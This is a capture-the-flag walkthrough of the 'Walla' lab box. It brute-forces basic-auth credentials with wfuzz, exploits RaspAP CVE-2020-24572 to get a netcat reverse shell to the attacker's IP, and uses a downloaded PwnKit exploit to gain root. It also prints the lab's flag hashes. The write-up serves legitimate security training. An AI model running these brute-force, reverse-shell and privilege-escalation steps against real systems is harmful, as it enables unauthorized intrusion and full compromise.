Summary #
Using WFUZZ for basic authentication credentials fuzzing on port 8091 we can get the login credentials. There is an application running called RaspAP 2.5. Using an exploit for this application (CVE-2020-24572) we get initial access as the www-data user. Using linpeas.sh we can see the target is vulnerable for CVE-2021-4034 (PwnKit). Once we run the exploit we get root access.
Specifications #
- Name: WALLA
- Platform: PG PRACTICE
- Points: 20
- Difficulty: Intermediate
- OS: Linux walla 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
- IP address: 192.168.115.97
- OFFSEC provided credentials: None
- HASH:
local.txt:6f58383d51705513382690968e602949 - HASH:
proof.txt:8d0a222465738905405b326e3024f2d5
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir walla && cd walla && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 3 20:03 .
drwxrwxr-x 16 kali kali 4096 Aug 3 20:03 ..
drwxrwxr-x 2 kali kali 4096 Aug 3 20:03 enum
drwxrwxr-x 2 kali kali 4096 Aug 3 20:03 exploits
drwxrwxr-x 2 kali kali 4096 Aug 3 20:03 files
drwxrwxr-x 2 kali kali 4096 Aug 3 20:03 tools
drwxrwxr-x 2 kali kali 4096 Aug 3 20:03 uploads
## set bash variable
ip=192.168.115.97
## ping target to check if it's online
ping $ip
PING 192.168.115.97 (192.168.115.97) 56(84) bytes of data.
64 bytes from 192.168.115.97: icmp_seq=1 ttl=61 time=20.2 ms
64 bytes from 192.168.115.97: icmp_seq=2 ttl=61 time=22.0 ms
^C
--- 192.168.115.97 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 20.195/21.072/21.950/0.877 ms
Reconnaissance #
Portscanning #
Using the Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.115.97:22
Open 192.168.115.97:23
Open 192.168.115.97:25
Open 192.168.115.97:53
Open 192.168.115.97:422
Open 192.168.115.97:8091
Open 192.168.115.97:42042
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 20:04 CEST
Initiating Ping Scan at 20:04
Scanning 192.168.115.97 [4 ports]
Completed Ping Scan at 20:04, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:04
Completed Parallel DNS resolution of 1 host. at 20:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:04
Scanning 192.168.115.97 [7 ports]
Discovered open port 25/tcp on 192.168.115.97
Discovered open port 23/tcp on 192.168.115.97
Discovered open port 53/tcp on 192.168.115.97
Discovered open port 22/tcp on 192.168.115.97
Discovered open port 422/tcp on 192.168.115.97
Discovered open port 8091/tcp on 192.168.115.97
Discovered open port 42042/tcp on 192.168.115.97
Completed SYN Stealth Scan at 20:04, 0.05s elapsed (7 total ports)
Nmap scan report for 192.168.115.97
Host is up, received echo-reply ttl 61 (0.020s latency).
Scanned at 2025-08-03 20:04:50 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
23/tcp open telnet syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
53/tcp open domain syn-ack ttl 61
422/tcp open ariel3 syn-ack ttl 61
8091/tcp open jamlink syn-ack ttl 61
42042/tcp open unknown syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 11 (460B) | Rcvd: 8 (336B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
23/tcp open telnet syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
53/tcp open domain syn-ack ttl 61
422/tcp open ariel3 syn-ack ttl 61
8091/tcp open jamlink syn-ack ttl 61
42042/tcp open unknown syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## change directory
cd files
## get a list, comma separated of the open port(s)
cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports
## output previous command
22,23,25,53,422,8091,42042
## move one up
cd ..
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,23,25,53,422,8091,42042 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02:71:5d:c8:b9:43:ba:6a:c8:ed:15:c5:6c:b2:f5:f9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtTTLmNtp3zqxLNrL/geNhp8WLkauSPqJ7WY9404pchYQN7BUkpOeUGRNUAtrmwQ02tSIcXSIgaMkP9QYkcgpJ3LgukIrX8aICoFPX8n1PEgZhEryhHomgcWL99ER4uTm9+CXuG3plBp7fgNtacHGGG9tlIn9DqcWwRcsB0WuzZwOT8n0PEwggyMKmhA4LuKKn1933nCCgVFIJ1NLfr9fM+VA3ZwVB7IcPEMrXPRo9q3lZLJtB69biTSnNROXB1pf50LFUUOnuAQwBG+4Md5TK+zbuGuCtf6zB69b+th+XSiGAIO6USodt3DfTo6Vr9ZUEtQykoI2wVJ2ZkeTqzqD3
| 256 f3:e5:10:d4:16:a9:9e:03:47:38:ba:ac:18:24:53:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKTe9nM9KOPFzCX46nVw5gPZi8A4pUJ54B+rw0ehE0PlTNyoAuHTnFwZNLsSPI2yXIve0UqQgs4PYXqhht5nc9A=
| 256 02:4f:99:ec:85:6d:79:43:88:b2:b5:7c:f0:91:fe:74 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO2CS9VQ1hSSMPudUXJYiFxw7cD92ImmSovNLtyyGSGu
23/tcp open telnet syn-ack ttl 61 Linux telnetd
25/tcp open smtp syn-ack ttl 61 Postfix smtpd
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Issuer: commonName=walla
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T18:26:36
| Not valid after: 2030-09-15T18:26:36
| MD5: 097c:bda1:76ab:9b73:c8ef:68ab:84e9:a055
| SHA-1: 6c4b:fee3:0bd6:d910:2ef9:f81a:3a41:72d8:31bd:baac
| -----BEGIN CERTIFICATE-----
| MIICzTCCAbWgAwIBAgIUSjsFHwJii76XBfqWrgTLj7nupXgwDQYJKoZIhvcNAQEL
| BQAwEDEOMAwGA1UEAwwFd2FsbGEwHhcNMjAwOTE3MTgyNjM2WhcNMzAwOTE1MTgy
| NjM2WjAQMQ4wDAYDVQQDDAV3YWxsYTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
| AQoCggEBAOwqF+jjwFmrSmgMiDEP1C3Adi9w1nrHCw8pFunsf2BnG4tRF3Xj2blV
| d5+CaCqmsiADAjFGXNREudaCvYKvw9ctU83dKw8khjho9Q+vm6AEMgS78uQNhQp3
| uXFkQVboMxYZdtxGs2/JkE0S52qYXScSJWer8uEon7qAkLgRJ1gQQHlqZ44ekmdt
| wPaQIu5IYWIeMYiLHb3Ivvk6esj/01NpaNmTNyljF2LxdEJaRjYYEMPqvS2Z5Dzd
| QL+fIWkeINwvWl+J4rkZA5xnLnOo08BG4MtGHAi0b2+bJ4fGT4fnrgoXoG6D9vIN
| jcxFhgScgAiA+ifARtuoKjWMukDiChUCAwEAAaMfMB0wCQYDVR0TBAIwADAQBgNV
| HREECTAHggV3YWxsYTANBgkqhkiG9w0BAQsFAAOCAQEAmzn/Ujcmz5o+qRXzL2ZR
| 60yEhjRd3kRaU4im8917uvzt7tZ/ELIGbCEEaNfhNOvyqDAtRPZC7U1m94baUqr+
| 741Er3x+NPR8A0aNn4tYq6SnD66XNeVecQfplg6uTjVCChO1iEAFXo1ETUjP6WV6
| Am8XspbmjffTPLWei0uw+qXfOL9TFu8sIFbhr0+UmV6ZpXNc+yoqGUlKFUTcHye0
| OZHrz6yNf+hUnMWBY6wWUB5SlpT4Onrnm6SWBU7rAD3kvLAsmpQHI38x5NTAxRWZ
| m5NUiiBnSYTwXytEvzHdqgkNxKPQDKnfS8D9oeVFjtM22TNKI8ytVFV+SQ0plPA+
| tQ==
|_-----END CERTIFICATE-----
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
53/tcp open tcpwrapped syn-ack ttl 61
422/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02:71:5d:c8:b9:43:ba:6a:c8:ed:15:c5:6c:b2:f5:f9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtTTLmNtp3zqxLNrL/geNhp8WLkauSPqJ7WY9404pchYQN7BUkpOeUGRNUAtrmwQ02tSIcXSIgaMkP9QYkcgpJ3LgukIrX8aICoFPX8n1PEgZhEryhHomgcWL99ER4uTm9+CXuG3plBp7fgNtacHGGG9tlIn9DqcWwRcsB0WuzZwOT8n0PEwggyMKmhA4LuKKn1933nCCgVFIJ1NLfr9fM+VA3ZwVB7IcPEMrXPRo9q3lZLJtB69biTSnNROXB1pf50LFUUOnuAQwBG+4Md5TK+zbuGuCtf6zB69b+th+XSiGAIO6USodt3DfTo6Vr9ZUEtQykoI2wVJ2ZkeTqzqD3
| 256 f3:e5:10:d4:16:a9:9e:03:47:38:ba:ac:18:24:53:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKTe9nM9KOPFzCX46nVw5gPZi8A4pUJ54B+rw0ehE0PlTNyoAuHTnFwZNLsSPI2yXIve0UqQgs4PYXqhht5nc9A=
| 256 02:4f:99:ec:85:6d:79:43:88:b2:b5:7c:f0:91:fe:74 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO2CS9VQ1hSSMPudUXJYiFxw7cD92ImmSovNLtyyGSGu
8091/tcp open http syn-ack ttl 61 lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B5F9F8F2263315029AD7A81420E6CC2D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02:71:5d:c8:b9:43:ba:6a:c8:ed:15:c5:6c:b2:f5:f9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtTTLmNtp3zqxLNrL/geNhp8WLkauSPqJ7WY9404pchYQN7BUkpOeUGRNUAtrmwQ02tSIcXSIgaMkP9QYkcgpJ3LgukIrX8aICoFPX8n1PEgZhEryhHomgcWL99ER4uTm9+CXuG3plBp7fgNtacHGGG9tlIn9DqcWwRcsB0WuzZwOT8n0PEwggyMKmhA4LuKKn1933nCCgVFIJ1NLfr9fM+VA3ZwVB7IcPEMrXPRo9q3lZLJtB69biTSnNROXB1pf50LFUUOnuAQwBG+4Md5TK+zbuGuCtf6zB69b+th+XSiGAIO6USodt3DfTo6Vr9ZUEtQykoI2wVJ2ZkeTqzqD3
| 256 f3:e5:10:d4:16:a9:9e:03:47:38:ba:ac:18:24:53:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKTe9nM9KOPFzCX46nVw5gPZi8A4pUJ54B+rw0ehE0PlTNyoAuHTnFwZNLsSPI2yXIve0UqQgs4PYXqhht5nc9A=
| 256 02:4f:99:ec:85:6d:79:43:88:b2:b5:7c:f0:91:fe:74 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO2CS9VQ1hSSMPudUXJYiFxw7cD92ImmSovNLtyyGSGu
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
8091/tcp open http syn-ack ttl 61 lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B5F9F8F2263315029AD7A81420E6CC2D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.53
If we visit the website on port 8091, we get a basic authentication login screen. Using WFUZZ we can get the credentials of this login.
wfuzz -w /opt/rockyou.txt --basic admin:FUZZ http://$ip:8091
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.115.97:8091/
Total requests: 14344392
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
<SNIP>
000000042: 200 278 L 830 W 12303 Ch "secret"
<SNIP>
The credentials are: admin:secret. Once typed in we indeed get logged in.
Now that we have working credentials we can look for an existing exploit. Once searching we could find: https://github.com/gerbsec/CVE-2020-24572-POC. Download the exploit, start a listener on port 422 and get a reverse shell as the www-data user in the /var/www/html/includes directory and get local.txt.
## setup a listener on port 422
nc -lnvp 422
listening on [any] 422 ...
## change directory
cd exploits
## download the exploit to `exploit.py`
curl https://raw.githubusercontent.com/gerbsec/CVE-2020-24572-POC/refs/heads/main/exploit.py > exploit.py
## run the exploit and press enter
python3 exploit.py $ip 8091 192.168.45.155 422 secret 1
[!] Using Reverse Shell: nc -e /bin/bash 192.168.45.155 422
[!] Sending activation request - Make sure your listener is running . . .
[>>>] Press ENTER to continue . . .
[!] You should have a shell :)
[!] Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh
## catch the reverse shell
nc -lnvp 422
listening on [any] 422 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.115.97] 59470
## list current user
whoami
www-data
## print the current working directory
pwd
/var/www/html/includes
## print `local.txt` in the root directory of the user `walter`
cat /home/walter/local.txt
6f58383d51705513382690968e602949
Privilege Escalation #
Because we’re not in tty we cannot switch user, so we need to upgrade our shell.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
www-data@walla:/home$ export TERM=xterm
www-data@walla:/home$ stty columns 200 rows 200
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.155/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::48f:d0ae:4aed:df81/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## change directory
www-data@walla:/home$ cd /var/tmp
## download `linpeas.sh`
www-data@walla:/var/tmp$ wget http://192.168.45.155/linpeas.sh
--2025-08-03 15:12:57-- http://192.168.45.155/linpeas.sh
Connecting to 192.168.45.155:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 0%[ linpeas.sh 82%[==================================================linpeas.sh 100%[=============================================================================================================>] 933.76K 3.85MB/s in 0.2s
2025-08-03 15:12:58 (3.85 MB/s) - 'linpeas.sh' saved [956174/956174]
www-data@walla:/var/tmp$ chmod +x linpeas.sh
www-data@walla:/var/tmp$ ./linpeas.sh
The linpeas.sh output shows the target is vulnerable for CVE-2021-4034 (PwnKit). Download the exploitt, upload to target, execute exploit, get root and proof.txt.
## change directory
cd uploads
## download exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o pwnkit
## start a webserver locally
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
## on target
## download exploit
www-data@walla:/var/tmp$ wget http://192.168.45.155/pwnkit
--2025-08-03 15:23:17-- http://192.168.45.155/pwnkit
Connecting to 192.168.45.155:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: 'pwnkit'
pwnkit 0%[ pwnkit 100%[=============================================================================================================>] 17.62K --.-KB/s in 0.02s
2025-08-03 15:23:17 (953 KB/s) - 'pwnkit' saved [18040/18040]
## set execution bit
www-data@walla:/var/tmp$ chmod +x pwnkit
## execute exploit
www-data@walla:/var/tmp$ ./pwnkit
## print the current user
root@walla:/var/tmp# whoami
root
## print `proof.txt`
root@walla:/var/tmp# cat /root/proof.txt
8d0a222465738905405b326e3024f2d5
References #
[+]